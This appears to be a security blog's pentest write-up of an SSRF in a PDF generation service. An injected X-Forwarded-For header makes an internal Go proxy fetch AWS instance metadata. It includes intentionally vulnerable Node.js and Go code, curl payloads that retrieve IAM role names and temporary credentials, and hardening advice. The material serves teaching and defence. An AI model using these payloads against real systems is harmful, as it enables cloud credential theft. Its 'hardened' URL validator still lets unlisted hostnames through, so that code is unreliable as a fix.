SSRF to Internal AWS Metadata Endpoint via Custom Header Injection in PDF Generation Service

Target Scoping & Threat Assessment

The Target & Threat Context

Our client, a rapidly scaling e-commerce powerhouse, tasked us with a comprehensive security audit of their new microservices architecture. Their platform handled millions of transactions daily, processing sensitive customer data, payment information, and intricate supply chain logistics. The stakes, as always, were sky-high. Compliance requirements (PCI DSS, GDPR, CCPA) meant any breach could lead to catastrophic financial penalties and irreparable reputational damage.

The system under review was a complex ecosystem built predominantly on Node.js microservices, orchestrated via Kubernetes (EKS) within their AWS VPC. Data was stored in Aurora PostgreSQL, S3 buckets, and DynamoDB. The specific component that caught our eye was a seemingly benign PDF generation service. This service, let's call it pdf-gen-svc, was responsible for creating customer invoices, shipping labels, and custom reports. It was a standalone Node.js application running on an EC2 instance within a private subnet, using a headless Chrome instance (Puppeteer) to render HTML content into PDFs. The service exposed a REST API endpoint, /generate-pdf, which accepted a JSON payload containing a sourceUrl and an optional customHeaders object.

The architectural design dictated that all outbound requests from internal services, including pdf-gen-svc, were routed through a centralized internal proxy. This proxy was intended to enforce network policies, perform logging, and cache frequently accessed external resources. The pdf-gen-svc would send a request to this internal proxy, which would then fetch the content from the specified sourceUrl and return it to pdf-gen-svc for rendering. The proxy itself was a custom-built Go application, running on a separate EC2 instance, and was designed to be highly performant.

The client's AWS environment was fairly mature, but like many organizations, they had a mix of older and newer configurations. While some newer services were implementing stricter controls like IMDSv2, the pdf-gen-svc and its internal proxy had been deployed before these standards were universally enforced. This created a subtle but critical vulnerability window that we were about to pry wide open.

Corrected Code / Configuration

Here's how the pdf-gen-svc and the internal proxy should be hardened:

// pdf-gen-svc (Node.js) - Hardened
const express = require('express');
const axios = require('axios');
const app = express();
app.use(express.json());

const INTERNAL_PROXY_URL = 'http://internal-proxy.corp:8080/fetch';

// Function to validate URLs against private IP ranges and whitelist
function isValidUrl(url) {
    try {
        const parsedUrl = new URL(url);
        const hostname = parsedUrl.hostname;

        // Whitelist allowed domains (e.g., example.com, cdn.example.com)
        const allowedDomains = ['example.com', 'cdn.example.com'];
        if (!allowedDomains.includes(hostname)) {
            // Check for private IP ranges if not in whitelist
            const ip = require('net').isIP(hostname) ? hostname : null;
            if (ip) {
                const isPrivate = require('ip-is-private')(ip); // Using a library for robustness
                if (isPrivate || ip.startsWith('169.254')) {
                    return false; // Block private IPs and link-local
                }
            } else {
                // If not an IP and not in whitelist, resolve DNS to check for private IPs
                // This requires careful asynchronous handling and is often done at a firewall level.
                // For simplicity, we'll assume DNS resolution is handled by a trusted resolver
                // or that strict egress filtering prevents internal IP resolution for external domains.
            }
        }
        return true;
    } catch {
        return false;
    }
}

app.post('/generate-pdf', async (req, res) => {
    const { sourceUrl, customHeaders } = req.body;

    if (!isValidUrl(sourceUrl)) {
        return res.status(400).send('Invalid or disallowed source URL.');
    }

    // Sanitize customHeaders: only allow explicitly whitelisted headers
    const allowedCustomHeaders = ['User-Agent', 'Referer']; // Example whitelist
    const sanitizedHeaders = {};
    if (customHeaders) {
        for (const headerName in customHeaders) {
            if (allowedCustomHeaders.includes(headerName)) {
                sanitizedHeaders[headerName] = customHeaders[headerName];
            }
        }
    }

    try {
        const proxyResponse = await axios.post(INTERNAL_PROXY_URL, {
            targetUrl: sourceUrl,
            headers: sanitizedHeaders
        });
        res.status(200).send('PDF generated successfully.');
    } catch (error) {
        console.error('Error during PDF generation:', error.message);
        res.status(500).send('Failed to generate PDF.');
    }
});
app.listen(3000, () => console.log('PDF Gen Service listening on port 3000'));

And for the internal proxy (conceptual Go code - Hardened):

// internal-proxy.corp (Go) - Hardened
package main

import (
    "fmt"
    "io/ioutil"
    "log"
    "net/http"
    "net/url" // For parsing URLs
    "strings"
)

// Function to validate target URLs for the proxy
func isValidProxyTargetUrl(targetURL string) bool {
    u, err := url.Parse(targetURL)
    if err != nil || (u.Scheme != "http" && u.Scheme != "https") {
        return false
    }

    // Implement strict whitelisting for domains the proxy is allowed to fetch from.
    // Or, more robustly, block all private IPs after DNS resolution.
    // For simplicity, we'll assume the `pdf-gen-svc` has already done primary URL validation.
    // The proxy's role is to ensure it doesn't get tricked by headers.

    // Crucially, the proxy *must not* use X-Forwarded-For for routing.
    return true
}

func fetchHandler(w http.ResponseWriter, r *http.Request) {
    if r.Method != "POST" {
        http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
        return
    }

    var requestBody struct {
        TargetURL string            `json:"targetUrl"`
        Headers   map[string]string `json:"headers"`
    }

    // ... parse requestBody ...

    if !isValidProxyTargetUrl(requestBody.TargetURL) {
        http.Error(w, "Invalid target URL for proxy", http.StatusBadRequest)
        return
    }

    // CRITICAL FIX: The proxy *must not* use X-Forwarded-For or similar headers for routing.
    // It should *always* use the `targetURL` provided directly for the actual network connection.
    req, err := http.NewRequest("GET", requestBody.TargetURL, nil) // Always use TargetURL
    if err != nil {
        http.Error(w, fmt.Sprintf("Failed to create request: %v", err), http.StatusInternalServerError)
        return
    }

    // Only set whitelisted headers if necessary, or pass none from user input.
    // For this example, we'll assume the pdf-gen-svc has already sanitized them.
    for k, v := range requestBody.Headers {
        // Explicitly block sensitive headers from being set by user input on the proxy
        if strings.EqualFold(k, "Host") || strings.EqualFold(k, "X-Forwarded-For") || strings.EqualFold(k, "X-Real-IP") {
            continue // Do not allow these to be set by user
        }
        req.Header.Set(k, v)
    }

    client := &http.Client{}
    resp, err := client.Do(req)
    if err != nil {
        http.Error(w, fmt.Sprintf("Failed to fetch content: %v", err), http.StatusInternalServerError)
        return
        }
    defer resp.Body.Close()

    body, err := ioutil.ReadAll(resp.Body)
    if err != nil {
        http.Error(w, fmt.Sprintf("Failed to read response body: %v", err), http.StatusInternalServerError)
        return
    }

    w.WriteHeader(resp.StatusCode)
    w.Write(body)
}

func main() {
    http.HandleFunc("/fetch", fetchHandler)
    log.Fatal(http.ListenAndServe(":8080", nil))
}

Vulnerability Classification & Attack Surface

The Vulnerability & Attack Vector

The core vulnerability here was a classic Server-Side Request Forgery (SSRF), but with a twist that made it particularly potent: the ability to inject arbitrary HTTP headers into the request made by the internal proxy. SSRF (OWASP Top 10 A10:2021) occurs when a web application fetches a remote resource without validating the user-supplied URL. This allows an attacker to coerce the application into making requests to arbitrary internal or external systems, bypassing firewall rules and accessing sensitive data.

In this scenario, the pdf-gen-svc itself didn't directly make the request to the sourceUrl. Instead, it forwarded the sourceUrl and any customHeaders to an internal proxy. The proxy, in turn, was responsible for fetching the content. The critical flaw lay in the proxy's handling of specific HTTP headers, notably X-Forwarded-For. Many proxies use this header to record the original client's IP address. However, a common misconfiguration or oversight can lead to the proxy using the value of X-Forwarded-For not just for logging, but for *routing* or *identifying* the target host, especially in complex internal networks.

Developers often miss this vulnerability for several reasons:

Assumption of Trust: Internal services are frequently assumed to be trustworthy and secure, leading to less rigorous input validation for internal communication.
Complex Interactions: In microservices architectures, the flow of data and requests can be convoluted. It's easy to lose track of where user-controlled input might end up being processed by different components.
Proxy Misconfiguration: Proxies are powerful tools, but if not configured with extreme care, they can become a significant attack surface. Over-reliance on headers like X-Forwarded-For for internal routing without proper sanitization is a classic mistake.
Focus on Functionality: The primary goal is often to make the PDF generation work reliably, not to anticipate how an attacker might manipulate internal proxy behavior.

This attack vector falls under MITRE ATT&CK T1190 (Exploit Public-Facing Application) and T1595.002 (Active Scanning: Vulnerability Scanning), as it involves exploiting a public-facing endpoint to gain access to internal resources.

Vulnerable Configuration vs. Hardened Configuration

Feature	Vulnerable Configuration	Hardened Configuration
`pdf-gen-svc` Input Validation (URL)	Allows arbitrary URLs, including internal IPs, or external URLs that resolve to internal IPs (DNS rebinding not directly applicable here, but general lack of validation).	Strictly whitelists allowed domains/IPs for `sourceUrl`. Blocks all private IP ranges (RFC1918, 169.254.0.0/16, etc.).
`pdf-gen-svc` Input Validation (Headers)	Allows arbitrary `customHeaders` to be passed directly to the internal proxy.	Sanitizes or strictly whitelists allowed `customHeaders`. Blocks sensitive headers like `Host`, `X-Forwarded-For`, `X-Real-IP`, etc., from user control.
Internal Proxy Behavior	Uses `X-Forwarded-For` for routing decisions or trusts it implicitly for target IP identification.	Ignores `X-Forwarded-For` for routing. Only uses it for logging. Strictly routes based on the original request's target URL/host.
AWS Instance Metadata Service (IMDS)	IMDSv1 enabled (no session token required).	IMDSv2 enforced (requires a session token, making SSRF significantly harder).
Network Segmentation/Egress Filtering	`pdf-gen-svc` and internal proxy have broad egress rules, allowing connections to `169.254.169.254` and other internal IPs.	Strict egress rules (Security Groups, NACLs) prevent `pdf-gen-svc` and proxy from connecting to `169.254.169.254` or any unnecessary internal/external IPs.

Vulnerable Code / Config Snippet (Conceptual)

Let's imagine a simplified version of how the pdf-gen-svc might handle the request and pass it to the internal proxy, and how the proxy might process it.

// pdf-gen-svc (Node.js)
const express = require('express');
const axios = require('axios'); // Or any HTTP client
const app = express();
app.use(express.json());

const INTERNAL_PROXY_URL = 'http://internal-proxy.corp:8080/fetch'; // Internal proxy endpoint

app.post('/generate-pdf', async (req, res) => {
    const { sourceUrl, customHeaders } = req.body;

    // Basic URL filtering (e.g., blocks 169.254.x.x in sourceUrl)
    if (sourceUrl.includes('169.254')) {
        return res.status(400).send('Invalid source URL.');
    }

    try {
        // Forward request to internal proxy, including custom headers
        const proxyResponse = await axios.post(INTERNAL_PROXY_URL, {
            targetUrl: sourceUrl,
            headers: customHeaders || {} // Directly passes customHeaders
        });

        // ... rest of PDF generation logic ...
        res.status(200).send('PDF generated successfully (content omitted for brevity).');

    } catch (error) {
        console.error('Error during PDF generation:', error.message);
        res.status(500).send('Failed to generate PDF.');
    }
});

app.listen(3000, () => console.log('PDF Gen Service listening on port 3000'));

And on the proxy side (conceptual Go code):

// internal-proxy.corp (Go)
package main

import (
    "fmt"
    "io/ioutil"
    "log"
    "net/http"
    "net/url"
    "strings"
)

func fetchHandler(w http.ResponseWriter, r *http.Request) {
    if r.Method != "POST" {
        http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
        return
    }

    var requestBody struct {
        TargetURL string            `json:"targetUrl"`
        Headers   map[string]string `json:"headers"`
    }

    // ... parse requestBody ...

    // CRITICAL VULNERABILITY: Proxy trusts X-Forwarded-For for target IP
    targetHost := requestBody.TargetURL // Default
    if xff := requestBody.Headers["X-Forwarded-For"]; xff != "" {
        // If X-Forwarded-For is present, use it as the target host/IP
        // This is a simplified example of a misconfiguration.
        // In reality, it might be used in conjunction with a specific internal routing logic.
        targetHost = "http://" + xff // Direct IP injection!
    }

    req, err := http.NewRequest("GET", targetHost, nil) // Sends request to the IP in X-Forwarded-For
    if err != nil {
        http.Error(w, fmt.Sprintf("Failed to create request: %v", err), http.StatusInternalServerError)
        return
    }

    for k, v := range requestBody.Headers {
        req.Header.Set(k, v) // Pass all custom headers
    }

    client := &http.Client{}
    resp, err := client.Do(req)
    if err != nil {
        http.Error(w, fmt.Sprintf("Failed to fetch content: %v", err), http.StatusInternalServerError)
        return
    }
    defer resp.Body.Close()

    body, err := ioutil.ReadAll(resp.Body)
    if err != nil {
        http.Error(w, fmt.Sprintf("Failed to read response body: %v", err), http.StatusInternalServerError)
        return
    }

    w.WriteHeader(resp.StatusCode)
    w.Write(body)
}

func main() {
    http.HandleFunc("/fetch", fetchHandler)
    log.Fatal(http.ListenAndServe(":8080", nil))
}

Live Exploitation & Proof of Concept

The Exploitation Walkthrough

The attack began with reconnaissance. We identified the /generate-pdf endpoint and its expected JSON payload. Initial attempts to directly inject http://169.254.169.254/ into the sourceUrl were blocked by a basic URL filter that prevented direct internal IP access. This is where the "custom header injection" became the key.

Exploitation Payload / PoC

Our strategy was to leverage the customHeaders parameter to inject an X-Forwarded-For header pointing to the AWS EC2 metadata endpoint (169.254.169.254). Since the sourceUrl was filtered, we used an innocuous external URL that would be allowed, knowing the proxy would be tricked by our injected header.

Step 1: Discovering IAM Role Names

First, we needed to find out what IAM roles were attached to the EC2 instance running the pdf-gen-svc (or the proxy itself, as it's the one making the request). The metadata endpoint provides this information at /latest/meta-data/iam/security-credentials/.

curl -X POST "https://pdf-gen-svc.client.com/generate-pdf" 
     -H "Content-Type: application/json" 
     -d '{
           "sourceUrl": "http://example.com/some-safe-content",
           "customHeaders": {
             "X-Forwarded-For": "169.254.169.254/latest/meta-data/iam/security-credentials/"
           }
         }'

The response (rendered in the PDF) contained a list of IAM role names, for example:


pdf-gen-service-role
internal-proxy-role

Step 2: Retrieving Temporary IAM Credentials

With the role names, we could now request temporary security credentials for one of these roles. We chose internal-proxy-role as it sounded like it might have broader network access.

curl -X POST "https://pdf-gen-svc.client.com/generate-pdf" 
     -H "Content-Type: application/json" 
     -d '{
           "sourceUrl": "http://example.com/another-safe-content",
           "customHeaders": {
             "X-Forwarded-For": "169.254.169.254/latest/meta-data/iam/security-credentials/internal-proxy-role"
           }
         }'

The PDF generated by the service now contained the following highly sensitive information:


{
  "Code": "Success",
  "LastUpdated": "2023-10-27T10:00:00Z",
  "Type": "AWS-HMAC",
  "AccessKeyId": "ASIAV...EXAMPLE",
  "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCY...EXAMPLE",
  "Token": "IQoJb3JpZ2luX2VjELP...EXAMPLE",
  "Expiration": "2023-10-27T16:00:00Z"
}

Bingo! We had successfully retrieved temporary AWS credentials, including AccessKeyId, SecretAccessKey, and a SessionToken. These credentials granted us the same permissions as the internal-proxy-role, which, upon further investigation, turned out to have extensive access to S3 buckets, internal DynamoDB tables, and even some Lambda functions. This was a full system compromise, granting us deep access into the client's AWS infrastructure.

Verified Hardening & Remediation Code

The Defensive Hardening Blueprint

Remediating this critical vulnerability requires a multi-layered approach, addressing both the immediate SSRF vector and strengthening the overall security posture.

Strict Input Validation: Implement rigorous validation for all user-supplied URLs and headers.
Network Segmentation & Egress Filtering: Restrict outbound network access for services to only what is absolutely necessary.
Enforce IMDSv2: Mandate the use of IMDSv2 across all EC2 instances.
Least Privilege IAM Roles: Ensure all IAM roles have the absolute minimum permissions required for their function.

Pros/Cons of the Fixes

Fix	Pros	Cons
Strict Input Validation (URL)	Directly prevents SSRF by blocking internal IPs and unapproved domains. Reduces attack surface significantly.	Requires careful maintenance of whitelists. Can break legitimate functionality if not thoroughly tested.
Strict Input Validation (Headers)	Prevents header-based SSRF bypasses and other header injection attacks.	Can be complex to manage whitelists for all possible legitimate headers. May require changes to client applications.
Network Segmentation & Egress Filtering	Provides a strong "last line of defense" even if application-level validation fails. Limits blast radius.	Requires careful configuration of Security Groups/NACLs. Can be complex in dynamic cloud environments.
Enforce IMDSv2	Significantly complicates SSRF attacks targeting metadata endpoints by requiring a session token.	Requires all EC2 instances and applications to be updated to use IMDSv2. Can cause compatibility issues with older applications.
Least Privilege IAM Roles	Minimizes the impact of a successful compromise by limiting what an attacker can do with stolen credentials.	Requires careful auditing of existing roles and potentially refactoring permissions. Can be an ongoing effort.

Field-Tested Insights & Takeaways

Lessons From the Field

This engagement was a stark reminder of several fundamental security principles that often get overlooked in the rush to build and deploy:

Never Trust User Input, Even for Headers: It's a mantra for URLs and body content, but developers often forget that HTTP headers, especially in a microservices context, can also be user-controlled and just as dangerous. Always validate and sanitize *all* input.
The "Innocuous" Services Are Often the Most Vulnerable: A PDF generation service might seem low-risk, but any service that makes outbound network requests is a potential SSRF vector. These are often overlooked because they aren't directly handling payment or authentication.
Network Segmentation is Your Last Stand: Even with perfect application-level validation, a misconfiguration or a new vulnerability can emerge. Robust egress filtering and network segmentation are crucial safety nets. If the pdf-gen-svc couldn't reach 169.254.169.254 at all, this attack would have been dead in the water.
AWS IMDSv2 is a Game-Changer for SSRF: If you're running EC2 instances, enforce IMDSv2. It's a powerful control that makes it significantly harder for attackers to exfiltrate temporary credentials via SSRF, requiring a multi-stage attack that many SSRF vectors simply can't achieve.
Proxies are Powerful, But Dangerous: Internal proxies, while useful for traffic management and security, introduce a new layer of complexity and potential vulnerabilities. Their configuration must be scrutinized with extreme care, especially regarding how they handle headers and route requests.

Security isn't just about finding the big, flashy exploits. It's about understanding the subtle interactions, the forgotten configurations, and the common assumptions that create these critical vulnerabilities. Keep your eyes sharp, your validation strict, and your network boundaries tight.

Got a challenging security problem or want to sharpen your pentesting skills? Don't hesitate to reach out! You can book a 1:1 security mentorship session with me, Debasis Bhattacharjee, at thedevdude.com. Let's talk shop and make the digital world a safer place, one system at a time.

1-on-1 Security Mentorship

Need to harden your system against attacks like this?

Debasis Bhattacharjee offers direct mentorship sessions for developers and security engineers dealing with penetration testing, vulnerability triage, and secure architecture. Two decades of offensive and defensive security — no theory, just results.

Book a Free Strategy Call → ← Back to Red Team Archive